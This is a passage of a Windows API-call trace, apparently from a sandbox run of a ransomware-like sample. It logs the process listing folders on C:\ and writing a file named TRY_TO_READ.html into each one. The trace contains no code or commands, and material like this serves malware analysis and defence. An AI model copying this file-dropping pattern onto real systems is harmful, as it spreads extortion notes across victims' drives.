	[0051.780] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x588cd8
	[0051.780] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846a8 | out: hHeap=0x540000) returned 1
	[0051.780] GetLastError () returned 0x7e
	[0051.780] SetLastError (dwErrCode=0x7e) 
	[0051.780] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x50) returned 0x58b730
	[0051.780] CreateFileW (lpFileName="C:\\\\$Recycle.Bin\\TRY_TO_READ.html" (normalized: "c:\\$recycle.bin\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3bc
	[0051.782] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58b730 | out: hHeap=0x540000) returned 1
	[0051.782] WriteFile (in: hFile=0x3bc, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0051.783] WriteFile (in: hFile=0x3bc, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0051.783] WriteFile (in: hFile=0x3bc, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0051.783] CloseHandle (hObject=0x3bc) returned 1
	[0051.784] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588cd8 | out: hHeap=0x540000) returned 1
	[0051.784] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596540 | out: hHeap=0x540000) returned 1
	[0051.784] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596520 | out: hHeap=0x540000) returned 1
	[0051.784] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583988 | out: hHeap=0x540000) returned 1
	[0051.784] FindNextFileW (in: hFindFile=0x574f20, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1e, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1
	[0051.784] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.784] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.784] GetLastError () returned 0x0
	[0051.784] SetLastError (dwErrCode=0x0) 
	[0051.784] GetLastError () returned 0x0
	[0051.785] SetLastError (dwErrCode=0x0) 
	[0051.785] GetLastError () returned 0x0
	[0051.785] SetLastError (dwErrCode=0x0) 
	[0051.785] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x596d50
	[0051.785] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x596da0
	[0051.785] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x596dc8
	[0051.785] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596520
	[0051.785] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596540
	[0051.785] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846a8
	[0051.785] GetLastError () returned 0x0
	[0051.785] SetLastError (dwErrCode=0x0) 
	[0051.785] GetLastError () returned 0x0
	[0051.785] SetLastError (dwErrCode=0x0) 
	[0051.785] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0051.785] CreateFileW (lpFileName="C:\\\\Boot\\TRY_TO_READ.html" (normalized: "c:\\boot\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3bc
	[0051.786] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0051.786] WriteFile (in: hFile=0x3bc, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0051.787] WriteFile (in: hFile=0x3bc, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0051.787] WriteFile (in: hFile=0x3bc, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0051.787] CloseHandle (hObject=0x3bc) returned 1
	[0051.787] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846a8 | out: hHeap=0x540000) returned 1
	[0051.787] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596540 | out: hHeap=0x540000) returned 1
	[0051.787] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596520 | out: hHeap=0x540000) returned 1
	[0051.787] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596dc8 | out: hHeap=0x540000) returned 1
	[0051.787] FindNextFileW (in: hFindFile=0x574f20, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x84a3bb2c, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x5db2a, dwReserved0=0x1e, dwReserved1=0x0, cFileName="bootmgr", cAlternateFileName="")) returned 1
	[0051.787] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.787] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.787] GetLastError () returned 0x0
	[0051.787] SetLastError (dwErrCode=0x0) 
	[0051.787] GetLastError () returned 0x0
	[0051.787] SetLastError (dwErrCode=0x0) 
	[0051.787] GetLastError () returned 0x0
	[0051.787] SetLastError (dwErrCode=0x0) 
	[0051.787] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583988
	[0051.787] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846a8
	[0051.787] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846a8 | out: hHeap=0x540000) returned 1
	[0051.787] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583988 | out: hHeap=0x540000) returned 1
	[0051.787] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x596dc8
	[0051.787] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x596df0
	[0051.787] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x18) returned 0x5981b0
	[0051.787] FindNextFileW (in: hFindFile=0x574f20, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac54a060, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac54a060, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac54a060, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x1e, dwReserved1=0x0, cFileName="BOOTSECT.BAK", cAlternateFileName="")) returned 1
	[0051.787] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.787] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.787] GetLastError () returned 0x0
	[0051.788] SetLastError (dwErrCode=0x0) 
	[0051.788] GetLastError () returned 0x0
	[0051.788] SetLastError (dwErrCode=0x0) 
	[0051.788] GetLastError () returned 0x0
	[0051.788] SetLastError (dwErrCode=0x0) 
	[0051.788] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x596e18
	[0051.788] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583988
	[0051.788] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846a8
	[0051.788] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846a8 | out: hHeap=0x540000) returned 1
	[0051.788] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583988 | out: hHeap=0x540000) returned 1
	[0051.788] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596e18 | out: hHeap=0x540000) returned 1
	[0051.788] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583988
	[0051.788] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x18) returned 0x5981d0
	[0051.788] FindNextFileW (in: hFindFile=0x574f20, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1e, dwReserved1=0x0, cFileName="Config.Msi", cAlternateFileName="")) returned 1
	[0051.788] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.788] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.788] GetLastError () returned 0x0
	[0051.788] SetLastError (dwErrCode=0x0) 
	[0051.788] GetLastError () returned 0x0
	[0051.788] SetLastError (dwErrCode=0x0) 
	[0051.788] GetLastError () returned 0x0
	[0051.788] SetLastError (dwErrCode=0x0) 
	[0051.788] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x596e18
	[0051.788] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x596e40
	[0051.788] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596e18 | out: hHeap=0x540000) returned 1
	[0051.788] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596e40 | out: hHeap=0x540000) returned 1
	[0051.788] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x596e40
	[0051.788] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x596e18
	[0051.788] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x596e68
	[0051.788] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596520
	[0051.788] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596540
	[0051.789] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846a8
	[0051.789] GetLastError () returned 0x0
	[0051.789] SetLastError (dwErrCode=0x0) 
	[0051.789] GetLastError () returned 0x0
	[0051.789] SetLastError (dwErrCode=0x0) 
	[0051.789] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0051.789] CreateFileW (lpFileName="C:\\\\Config.Msi\\TRY_TO_READ.html" (normalized: "c:\\config.msi\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3bc
	[0051.789] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0051.789] WriteFile (in: hFile=0x3bc, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0051.790] WriteFile (in: hFile=0x3bc, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0051.790] WriteFile (in: hFile=0x3bc, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0051.790] CloseHandle (hObject=0x3bc) returned 1
	[0051.790] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846a8 | out: hHeap=0x540000) returned 1
	[0051.790] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596540 | out: hHeap=0x540000) returned 1
	[0051.790] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596520 | out: hHeap=0x540000) returned 1
	[0051.790] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596e68 | out: hHeap=0x540000) returned 1
	[0051.790] FindNextFileW (in: hFindFile=0x574f20, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1
	[0051.790] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.791] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.791] GetLastError () returned 0x0
	[0051.791] SetLastError (dwErrCode=0x0) 
	[0051.791] GetLastError () returned 0x0
	[0051.791] SetLastError (dwErrCode=0x0) 
	[0051.791] GetLastError () returned 0x0
	[0051.791] SetLastError (dwErrCode=0x0) 
	[0051.791] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583918
	[0051.791] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x5839c0
	[0051.791] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583918 | out: hHeap=0x540000) returned 1
	[0051.791] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5839c0 | out: hHeap=0x540000) returned 1
	[0051.791] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846a8
	[0051.791] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x596e68
	[0051.791] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0051.791] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596520
	[0051.791] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596540
	[0051.791] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584738
	[0051.791] GetLastError () returned 0x0
	[0051.791] SetLastError (dwErrCode=0x0) 
	[0051.791] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x588cd8
	[0051.791] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584738 | out: hHeap=0x540000) returned 1
	[0051.791] GetLastError () returned 0x0
	[0051.791] SetLastError (dwErrCode=0x0) 
	[0051.791] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x60) returned 0x5a1038
	[0051.791] CreateFileW (lpFileName="C:\\\\Documents and Settings\\TRY_TO_READ.html" (normalized: "c:\\documents and settings\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3bc
	[0051.792] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a1038 | out: hHeap=0x540000) returned 1
	[0051.792] WriteFile (in: hFile=0x3bc, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0051.793] WriteFile (in: hFile=0x3bc, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0051.793] WriteFile (in: hFile=0x3bc, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0051.793] CloseHandle (hObject=0x3bc) returned 1
	[0051.793] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588cd8 | out: hHeap=0x540000) returned 1
	[0051.793] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596540 | out: hHeap=0x540000) returned 1
	[0051.793] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596520 | out: hHeap=0x540000) returned 1
	[0051.793] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0051.793] FindNextFileW (in: hFindFile=0x574f20, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x56257dc0, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x56257dc0, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0x813b7be0, ftLastWriteTime.dwHighDateTime=0x1d4d5ae, nFileSizeHigh=0x0, nFileSizeLow=0x5ff9d000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1
	[0051.793] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.794] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.794] GetLastError () returned 0x0
	[0051.794] SetLastError (dwErrCode=0x0) 
	[0051.794] GetLastError () returned 0x0
	[0051.794] SetLastError (dwErrCode=0x0) 
	[0051.794] GetLastError () returned 0x0
	[0051.794] SetLastError (dwErrCode=0x0) 
	[0051.794] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x596e90
	[0051.794] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x5839c0
	[0051.794] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0051.794] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0051.794] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5839c0 | out: hHeap=0x540000) returned 1
	[0051.794] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596e90 | out: hHeap=0x540000) returned 1
	[0051.794] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x5839c0
	[0051.794] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x18) returned 0x5981f0
	[0051.794] FindNextFileW (in: hFindFile=0x574f20, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSOCache", cAlternateFileName="")) returned 1
	[0051.794] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.794] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.794] GetLastError () returned 0x0
	[0051.794] SetLastError (dwErrCode=0x0) 
	[0051.794] GetLastError () returned 0x0
	[0051.794] SetLastError (dwErrCode=0x0) 
	[0051.794] GetLastError () returned 0x0
	[0051.794] SetLastError (dwErrCode=0x0) 
	[0051.794] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x596e90
	[0051.794] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x596eb8
	[0051.794] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596e90 | out: hHeap=0x540000) returned 1
	[0051.794] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596eb8 | out: hHeap=0x540000) returned 1
	[0051.794] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x596eb8
	[0051.794] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x596e90
	[0051.794] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x596ee0
	[0051.794] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596520
	[0051.795] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596540
	[0051.795] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0051.795] GetLastError () returned 0x0
	[0051.795] SetLastError (dwErrCode=0x0) 
	[0051.795] GetLastError () returned 0x0
	[0051.795] SetLastError (dwErrCode=0x0) 
	[0051.795] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584738
	[0051.795] CreateFileW (lpFileName="C:\\\\MSOCache\\TRY_TO_READ.html" (normalized: "c:\\msocache\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3bc
	[0051.795] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584738 | out: hHeap=0x540000) returned 1
	[0051.795] WriteFile (in: hFile=0x3bc, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0051.796] WriteFile (in: hFile=0x3bc, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0051.796] WriteFile (in: hFile=0x3bc, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0051.796] CloseHandle (hObject=0x3bc) returned 1
	[0051.797] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0051.797] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596540 | out: hHeap=0x540000) returned 1
	[0051.797] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596520 | out: hHeap=0x540000) returned 1
	[0051.797] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596ee0 | out: hHeap=0x540000) returned 1
	[0051.797] FindNextFileW (in: hFindFile=0x574f20, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x563d4b80, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x563d4b80, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0x814762c0, ftLastWriteTime.dwHighDateTime=0x1d4d5ae, nFileSizeHigh=0x0, nFileSizeLow=0x7ff7c000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pagefile.sys", cAlternateFileName="")) returned 1
	[0051.797] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.797] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.797] GetLastError () returned 0x0
	[0051.797] SetLastError (dwErrCode=0x0) 
	[0051.797] GetLastError () returned 0x0
	[0051.797] SetLastError (dwErrCode=0x0) 
	[0051.797] GetLastError () returned 0x0
	[0051.797] SetLastError (dwErrCode=0x0) 
	[0051.797] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x596ee0
	[0051.797] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583918
	[0051.797] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0051.797] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0051.797] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583918 | out: hHeap=0x540000) returned 1
	[0051.797] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596ee0 | out: hHeap=0x540000) returned 1
	[0051.797] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583918
	[0051.797] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x18) returned 0x598210
	[0051.797] FindNextFileW (in: hFindFile=0x574f20, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PerfLogs", cAlternateFileName="")) returned 1
	[0051.797] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.797] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.797] GetLastError () returned 0x0
	[0051.797] SetLastError (dwErrCode=0x0) 
	[0051.797] GetLastError () returned 0x0
	[0051.797] SetLastError (dwErrCode=0x0) 
	[0051.797] GetLastError () returned 0x0
	[0051.797] SetLastError (dwErrCode=0x0) 
	[0051.797] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x596ee0
	[0051.797] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x596f08
